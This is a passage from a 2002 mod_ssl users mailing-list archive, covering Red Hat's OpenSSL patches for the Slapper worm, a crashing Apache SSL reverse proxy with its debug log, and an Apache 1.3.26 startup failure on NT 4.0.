or as an official confirmation of any transaction. All market prices, data
and other information are not warranted as to completeness or accuracy and
are subject to change without notice. Any comments or statements made herein
do not necessarily reflect those of J.P. Morgan Chase & Co., its
subsidiaries and affiliates.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 12:10:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA18220; Fri, 20 Sep 2002 12:09:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id MAA18211; Fri, 20 Sep 2002 12:08:34 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g8KA7QP01894;
	Fri, 20 Sep 2002 11:07:48 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 20 Sep 2002 11:07:23 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F20CB@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org, openssl-users@openssl.org
Subject: Red Hat Linux update for Linux Slapper worm
Date: Fri, 20 Sep 2002 11:07:18 +0100
X-Message-Flag: I don't like having to use Outlook either!
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You can disregard the following email if you don't use Red Hat Linux 7.0 and
above.

Having waited for an update to openssl from RedHat, I decided to call them.
They've not had anyone ask them for an update, which came as a bit of a
shock. I have therefore registered a request to release an update to openssl
via their bugzilla site. For information, the vulnerability that Linux
Slapper takes advantage of was fixed in openssl on 30th July. See
http://www.cert.org/advisories/CA-2002-23.html for details.

The previous openssl errata at
http://rhn.redhat.com/errata/RHSA-2002-160.html has no mention of the buffer
overflows fixed on July 30th. This package was built on August 1st, so it is
unlikely to include the 0.9.6d patches due to the time lag of testing
patches by Red Hat.

You can add your comments to the bug report at
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=74312. If I haven't
heard from them soon, I will probably release an update myself.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Reality TV - the ultimate oxymoron


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 12:23:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA18670; Fri, 20 Sep 2002 12:22:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id MAA18659; Fri, 20 Sep 2002 12:21:15 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP
	id B93F83033; Fri, 20 Sep 2002 12:21:13 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id DC0D22FA2; Fri, 20 Sep 2002 12:21:10 +0200 (METDST)
Date: Fri, 20 Sep 2002 12:21:10 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Cc: openssl-users@openssl.org
Subject: Re: Red Hat Linux update for Linux Slapper worm
Message-ID: <20020920102110.GA307@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org, openssl-users@openssl.org
References: <9B66BBD37D5DD411B8CE00508B69700F033F20CB@pborolocal.rnib.org.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F20CB@pborolocal.rnib.org.uk>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, Sep 20, 2002 at 11:07:18AM +0100, John.Airey@rnib.org.uk wrote:
> The previous openssl errata at
> http://rhn.redhat.com/errata/RHSA-2002-160.html has no mention of the buffer
> overflows fixed on July 30th. This package was built on August 1st, so it is
> unlikely to include the 0.9.6d patches due to the time lag of testing
> patches by Red Hat.

I cannot give you a definite statement about what I don't know, but I can
participate in speculating :-)
Redhat as well as other system builders have been informed well in advance
about the vulnerabilities including patches to fix them, such that tests
could be performed and updates be prepared. It was our intention that
updated binary packages could be made available more or less in parallel
to our announcement and source code release.

That does not mean, that the fix is actually in. I simply don't know.

Best regard,
	Lutz
PS. OpenSSl team member Mark Cox is actually working for Redhat...
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 12:34:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA19091; Fri, 20 Sep 2002 12:33:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id MAA19073; Fri, 20 Sep 2002 12:32:03 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g8KAVQP03328;
	Fri, 20 Sep 2002 11:31:32 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 20 Sep 2002 11:31:24 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F20CF@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org, openssl-users@openssl.org
Subject: Red Hat Linux update for Linux Slapper worm
Date: Fri, 20 Sep 2002 11:31:18 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Further to my previous posting, I have been informed by Red Hat of the
following:

"http://rhn.redhat.com/errata/RHSA-2002-155.html was released on the 29th of
July
and fixed the vulnerability that the Linux Slapper worm takes advantage of.
We
released a new version of OpenSSL a little later that fixed one of the other
vulnerabilities, http://rhn.redhat.com/errata/RHSA-2002-160.html

If you upgraded to either of the OpenSSL errata and followed the
instructions
about restarting your services you are protected against the Linux slapper
worm.
 
Just to explain how we can have a fix so quickly - The OpenSSL group gave
vendors advance notice of the vulnerabilities giving us time to prepare
updated
packages in advance of their advisory."
 
However, Red Hat (and others such as Suse) have been very quiet about this.
They have not informed CERT or Bugtraq that this vulnerability is fixed in
their latest version. I didn't even get told this when I rang their support
department.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Reality TV - the ultimate oxymoron


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 12:40:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA19287; Fri, 20 Sep 2002 12:39:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id MAA19264; Fri, 20 Sep 2002 12:38:53 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g8KAbZP03763;
	Fri, 20 Sep 2002 11:37:52 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 20 Sep 2002 11:37:33 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F20D0@pborolocal.rnib.org.uk>
To: mjc@redhat.com
Cc: modssl-users@modssl.org, openssl-users@openssl.org
Subject: RE: Red Hat Linux update for Linux Slapper worm
Date: Fri, 20 Sep 2002 11:37:23 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

So why do your telephone support people not know about this? They advised me
to log it on bugzilla in the first place. Why isn't this page linked to from
your errata site? That's where people look for updates. Why no information
to CERT or Bugtraq?

You're beginning to make Microsoft look professional, which is a scary
thought.

John

> -----Original Message-----
> From: Mark J Cox [mailto:mjc@redhat.com]
> Sent: 20 September 2002 12:25
> To: John.Airey@rnib.org.uk
> Cc: modssl-users@modssl.org; openssl-users@openssl.org
> Subject: Re: Red Hat Linux update for Linux Slapper worm
> 
> 
> > The previous openssl errata at
> > http://rhn.redhat.com/errata/RHSA-2002-160.html has no 
> mention of the
> > buffer overflows fixed on July 30th. This package was built 
> on August
> > 1st, so it is unlikely to include the 0.9.6d patches due to 
> the time lag
> > of testing patches by Red Hat.
> 
> On the www.redhat.com home page you will find a link about the slapper
> worm, http://www.redhat.com/support/alerts/linux_slapper_worm.html
> 
> Versions of OpenSSL that are not vulnerable to this worm have been
> available from Red Hat since 29th July 2002. Customers who 
> have kept their
> systems up to date are not impacted by this worm.
> 
> http://rhn.redhat.com/errata/RHSA-2002-155.html was released 
> on the 29th
> of July and fixed the vulnerability that the Linux Slapper worm takes
> advantage of.  We released a new version of OpenSSL a little 
> later that
> fixed one of the other vulnerabilities,
> http://rhn.redhat.com/errata/RHSA-2002-160.html
> 
> If you upgraded to either of the OpenSSL errata and followed the
> instructions about restarting your services you are protected 
> against the
> Linux slapper worm.
> 
> Thanks, Mark
> -- 
> Mark J Cox / Security Response Team / Red Hat
> Tel: +44 798 061 3110 // Fax: +44 870 1319174
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 16:12:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA24123; Fri, 20 Sep 2002 16:11:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA24100; Fri, 20 Sep 2002 16:10:53 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D1D724CE752; Fri, 20 Sep 2002 16:10:52 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B0BBA28749; Fri, 20 Sep 2002 16:06:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dell1.moose.awe.com id MAA18677; Fri, 20 Sep 2002 12:22:49 +0200 (MET DST)
Received: from dell1.moose.awe.com ([127.0.0.1] helo=localhost)
	by dell1.moose.awe.com with esmtp (Exim 4.05)
	id 17sLuQ-0001Kk-00; Fri, 20 Sep 2002 12:25:18 +0100
Date: Fri, 20 Sep 2002 12:25:18 +0100 (BST)
From: Mark J Cox 
X-X-Sender: mark@dell1.moose.awe.com
To: John.Airey@rnib.org.uk
Cc: modssl-users@modssl.org, 
Subject: Re: Red Hat Linux update for Linux Slapper worm
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F20CB@pborolocal.rnib.org.uk>
Message-ID: 
X-PGP-Public-Key: http://www.awe.com/mark/pgpkey.asc
X-PGP-Fingerprint: 7B79 19FA 716B 8725 0E77 21E5 52D9 83BF
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mark J Cox 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> The previous openssl errata at
> http://rhn.redhat.com/errata/RHSA-2002-160.html has no mention of the
> buffer overflows fixed on July 30th. This package was built on August
> 1st, so it is unlikely to include the 0.9.6d patches due to the time lag
> of testing patches by Red Hat.

On the www.redhat.com home page you will find a link about the slapper
worm, http://www.redhat.com/support/alerts/linux_slapper_worm.html

Versions of OpenSSL that are not vulnerable to this worm have been
available from Red Hat since 29th July 2002. Customers who have kept their
systems up to date are not impacted by this worm.

http://rhn.redhat.com/errata/RHSA-2002-155.html was released on the 29th
of July and fixed the vulnerability that the Linux Slapper worm takes
advantage of.  We released a new version of OpenSSL a little later that
fixed one of the other vulnerabilities,
http://rhn.redhat.com/errata/RHSA-2002-160.html

If you upgraded to either of the OpenSSL errata and followed the
instructions about restarting your services you are protected against the
Linux slapper worm.

Thanks, Mark
-- 
Mark J Cox / Security Response Team / Red Hat
Tel: +44 798 061 3110 // Fax: +44 870 1319174
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 16:12:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA24130; Fri, 20 Sep 2002 16:11:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id QAA24099; Fri, 20 Sep 2002 16:10:52 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BE3A34CE749; Fri, 20 Sep 2002 16:10:52 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 8D6DB286BB; Fri, 20 Sep 2002 16:06:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.epremiumsystems.com id KAA14891; Fri, 20 Sep 2002 10:38:23 +0200 (MET DST)
Received: from FALCON ([202.126.141.44])
          by smtp.epremiumsystems.com (Lotus Domino Release 5.0.5)
          with ESMTP id 2002092016565990:284 ;
          Fri, 20 Sep 2002 16:56:59 +0800 
From: "Lee Hoo Wah" 
To: 
Subject: SSL Reverse Proxy with Client Certificate is restarting
Date: Fri, 20 Sep 2002 16:38:19 +0800
Message-ID: 
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-MIMETrack: Itemize by SMTP Server on starwars/Premium(Release 5.0.5 |September 22, 2000) at
 09/20/2002 04:56:59 PM,
	Serialize by Router on starwars/Premium(Release 5.0.5 |September 22, 2000) at
 09/20/2002 04:57:03 PM,
	Serialize complete at 09/20/2002 04:57:03 PM
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lee Hoo Wah" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I have a problem using Apache/mod_ssl 2.0.39 as a SSL reverse proxy to
connect to a SSL Server.

	|HTTP Client|-----http---->|Reverse Proxy|----https---->|Web Server|

There is a Client Certificate on the Reverse Proxy which must be presented
to the Web Server for authentication. But I see from the log files, after
the initial SSL handshaking, immediately after the "Proxy client certificate
callback: (xxx.xxx.xxx:80) found acceptable cert", the child process on the
Reverse Proxy just dies without any error in the log file. The child process
initialises itself all over again. My browser on the front end receives a
"Page not found" error.

I double checked my cert pathing using "openssl" and curl to go into the SSL
server and it works. So I think the certificate should be ok. Are there
anything else that I have left out?

I have also tested against both a IIS 5.0 and an Apache 2.0 web server. Both
returns the same error.

Really appreciate any help that might come along. Thanks in advace.

regards,
Lee Hoo Wah

____________________________________________
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server hello A
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 2,
subject: /C=US/O=GTE Corporation/CN=GTE CyberTrust Root, issuer: /C=US/O=GTE
Corporation/CN=GTE CyberTrust Root
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 1,
subject: /C=US/O=Entrust.net/OU=www.entrust.net/CPS incorp. by ref. (limits
liab.)/OU=(c) 1999 Entrust.net Limited/CN=Entrust.net Secure Server
Certification Authority, issuer: /C=US/O=GTE Corporation/CN=GTE CyberTrust
Root
[debug] ssl_engine_kernel.c(1294): Certificate Verification: depth: 0,
subject: /C=SG/ST=Singapore/L=Singapore/O=xxx/OU=xxx/CN=xxx, issuer:
/C=US/O=Entrust.net/OU=www.entrust.net/CPS incorp. by ref. (limits
liab.)/OU=(c) 1999 Entrust.net Limited/CN=Entrust.net Secure Server
Certification Authority
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server
certificate A
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server
certificate request A
[debug] ssl_engine_kernel.c(1854): OpenSSL: Loop: SSLv3 read server done A
[debug] ssl_engine_kernel.c(1620): Proxy client certificate callback:
(xxx.xxx.xxx:80) entered
[debug] ssl_engine_kernel.c(1593): Proxy client certificate callback:
(xxx.xxx.xxx:80) found acceptable cert, sending
/C=xx/O=xxx/OU=xxx/OU=xxx/SN=xxx/CN=xxxx
[notice] Parent: child process exited with status 3221225477 -- Restarting.
<<<<<< CHILD PROCESS DIES
[debug] mpm_winnt.c(562): Parent: Marked listeners as not inheritable.
[info] Init: Initializing OpenSSL library

_______________________________________

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 16:42:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA25310; Fri, 20 Sep 2002 16:41:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from battersbox.nameconnector.com id QAA25303; Fri, 20 Sep 2002 16:40:45 +0200 (MET DST)
Received: from MAILBOX.nameconnector.com ([10.1.64.1]) by battersbox.nameconnector.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Fri, 20 Sep 2002 10:40:34 -0400
Received: by mailbox.nameconnector.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 20 Sep 2002 10:40:34 -0400
Message-ID: <61957B071FF421419E567A28A45C7FE5400EDA@mailbox.nameconnector.com>
From: Geoffrey Talvola 
To: "'modssl-users@modssl.org'" 
Subject: RE: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
Date: Fri, 20 Sep 2002 10:40:34 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
X-OriginalArrivalTime: 20 Sep 2002 14:40:34.0345 (UTC) FILETIME=[AD584190:01C260B3]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoffrey Talvola 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Apache 1.3.26, which comes with the OpenSA release I referred to.

- Geoff

> -----Original Message-----
> From: Paul Bleimeyer [mailto:paulb@mayo.edu]
> Sent: Thursday, September 19, 2002 6:42 PM
> To: modssl-users@modssl.org
> Subject: RE: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> 
> 
> Geoff,
> 
> Are you running 1.x or 2.40 apache?
> 
> Regards,
> 
> Paul
> 
> 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Geoffrey Talvola
> > Sent: Thursday, September 19, 2002 1:28 PM
> > To: 'modssl-users@modssl.org'
> > Subject: RE: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> > 
> > 
> > I'm using the binaries from the OpenSA package and they are 
> > working fine for
> > me, both on NT and on 2000.
> > 
> > details at http://www.opensa.org/development/news/101.html
> > 
> > - Geoff
> > 
> > > -----Original Message-----
> > > From: David Diehl [mailto:ddiehl@atlas-tech.com]
> > > Sent: Thursday, September 19, 2002 2:15 PM
> > > To: modssl-users@modssl.org
> > > Subject: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> > > 
> > > 
> > > Has anybody got this to function on a NT 4.0 server?
> > > 
> > > I've downloaded and compiled apache 1.3.26 with modssl 2.8.10 and
> > > openssl 9.6g and can't seem to get it to work on a NT 4.0 
> server. It
> > > works fine on a windows 2000 server, but when I try and start 
> > > it on a NT
> > > 4.0 server the second apache process never starts and there 
> > > are no error
> > > indications in the log files.
> > > 
> > > I've also download 2 seperate precompiled builds and 
> niether of them
> > > came with the openssl dll files libeay32.dll and 
> ssleay32.dll, which
> > > normally reside in the system32 directory. If I use the ones 
> > > I compiled,
> > > the same symptoms occur. Of course, if I remove all SSL 
> > > directives from
> > > the httpd.conf file, I don't need the dll's and it 
> > functions properly.
> > > 
> > > It seems that any version prior to 9.6 i.e. 9.5a  functions 
> > > without any
> > > problems.
> > > 
> > > Any ideas or insight would be greatly appreciated.
> > > 
> > > Thanks
> > > 
> > > David
> > > 
> > > 
> > 
> ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   
> > www.modssl.org
> > > User Support Mailing List                      
> > modssl-users@modssl.org
> > > Automated List Manager                            
> > majordomo@modssl.org
> > > 
> > 
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 16:51:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA25610; Fri, 20 Sep 2002 16:50:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from atlaspdc.atlas-tech.com id QAA25595; Fri, 20 Sep 2002 16:49:18 +0200 (MET DST)
Received: from atlas-tech.com (sc021ws036.nosc.mil [198.253.21.36]) by atlaspdc.atlas-tech.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id Q5ZYZAAY; Fri, 20 Sep 2002 10:48:07 -0400
Message-ID: <3D8B35D7.5BA20545@atlas-tech.com>
Date: Fri, 20 Sep 2002 10:51:03 -0400
From: David Diehl 
X-Mailer: Mozilla 4.73 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
References: <00a001c2602d$c6e311c0$57d4b081@doorstop>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Diehl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm running 1.3.26; I re-tried the opensa precompiled apache and used their
httpd.conf vice mine  and I think I may have narrowed it down to an
incompatibility with the mod_ntlm.so module that I'm loading in my
httpd.conf. If I don't load that module I can get it to run on NT 4.0. Why
it's causing the symptoms I'm observing is unknown.

David

Paul Bleimeyer wrote:

> Geoff,
>
> Are you running 1.x or 2.40 apache?
>
> Regards,
>
> Paul
>
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Geoffrey Talvola
> > Sent: Thursday, September 19, 2002 1:28 PM
> > To: 'modssl-users@modssl.org'
> > Subject: RE: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> >
> >
> > I'm using the binaries from the OpenSA package and they are
> > working fine for
> > me, both on NT and on 2000.
> >
> > details at http://www.opensa.org/development/news/101.html
> >
> > - Geoff
> >
> > > -----Original Message-----
> > > From: David Diehl [mailto:ddiehl@atlas-tech.com]
> > > Sent: Thursday, September 19, 2002 2:15 PM
> > > To: modssl-users@modssl.org
> > > Subject: Mod_SSL_2.8.10 and OpenSSL_0.9.6g
> > >
> > >
> > > Has anybody got this to function on a NT 4.0 server?
> > >
> > > I've downloaded and compiled apache 1.3.26 with modssl 2.8.10 and
> > > openssl 9.6g and can't seem to get it to work on a NT 4.0 server. It
> > > works fine on a windows 2000 server, but when I try and start
> > > it on a NT
> > > 4.0 server the second apache process never starts and there
> > > are no error
> > > indications in the log files.
> > >
> > > I've also download 2 seperate precompiled builds and niether of them
> > > came with the openssl dll files libeay32.dll and ssleay32.dll, which
> > > normally reside in the system32 directory. If I use the ones
> > > I compiled,
> > > the same symptoms occur. Of course, if I remove all SSL
> > > directives from
> > > the httpd.conf file, I don't need the dll's and it
> > functions properly.
> > >
> > > It seems that any version prior to 9.6 i.e. 9.5a  functions
> > > without any
> > > problems.
> > >
> > > Any ideas or insight would be greatly appreciated.
> > >
> > > Thanks
> > >
> > > David
> > >
> > >
> > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)
> > www.modssl.org
> > > User Support Mailing List
> > modssl-users@modssl.org
> > > Automated List Manager
> > majordomo@modssl.org
> > >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Sep 20 17:04:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA25977; Fri, 20 Sep 2002 17:03:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id RAA25957; Fri, 20 Sep 2002 17:02:17 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Fri, 20 Sep 2002 08:02:11 -0700
X-Originating-IP: [217.39.67.29]
User-Agent: Microsoft-Entourage/10.1.0.2006
Date: Fri, 20 Sep 2002 16:02:33 +0100
Subject: http + https
From: Mark Cance 
To: 
Message-ID: 
Mime-version: 1.0
Content-type: multipart/alternative; boundary="B_3115382554_1074010"
X-OriginalArrivalTime: 20 Sep 2002 15:02:11.0463 (UTC) FILETIME=[B27CC170:01C260B6]
Sender: owner-modssl-users@modssl.org
